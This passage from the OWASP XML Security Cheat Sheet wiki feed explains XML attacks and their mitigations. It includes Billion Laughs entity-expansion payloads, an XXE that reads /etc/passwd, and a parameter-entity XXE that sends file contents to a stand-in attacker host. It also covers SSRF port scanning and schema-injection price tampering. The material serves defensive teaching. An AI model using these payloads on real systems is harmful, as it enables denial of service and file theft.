 &amp;lt;root&amp;gt;'''&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(a 100.000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the external entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt; &lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;LOL9;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 entities defined in &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; then each of these entities will be resolved in &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; and so on. Finally, the CPU and/or memory will be affected by parsing the 3*10^9 (3,000,000,000) entities defined in this schema, which could make the parser crash. &lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message :&lt;br /&gt;
 &amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot; ENCODING=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt; &lt;br /&gt;
 &amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;'''&amp;amp;LOL9;'''&amp;quot; XMLNS:SOAP=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
   &amp;lt;KEYWORD XMLNS=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
 &amp;lt;/SOAP:ENVELOPE&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY '''xxe''' SYSTEM &amp;quot;'''/etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;xxe;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, which is in fact the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, which will be expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF ) happens when the server receives a malicious XML schema, which makes the server retrieve remote resources such as a file, a file via HTTP/HTTPS/FTP, etc. SSRF has been used to retrieve remote files, to prove a XXE when you cannot reflect back the file or perform port scanning, or perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY '''%xxe''' SYSTEM &amp;quot;'''http://attacker/evil.dtd'''&amp;quot;&amp;gt; &lt;br /&gt;
  '''%xxe;'''&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allows for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt; which loads a remote DTD. The remote DTD should contain something like this::&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
The simplest and most unusual scenario, with complete disclosure you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the time of response when connected to a valid port will be very quick (one second, for example). The differences between open and closed ports becomes quite clear.   &lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host; then analyze the average time for each port to determinate the status of each port. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI scheme. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224439</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224439"/>
				<updated>2016-12-21T20:26:33Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using not well formed documents.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities are to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coersive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closed the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and set the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10.  If the application processes only the first values provided for the id and the value without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption  some values must be encoded using base64 . This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and will consider it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Negative numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
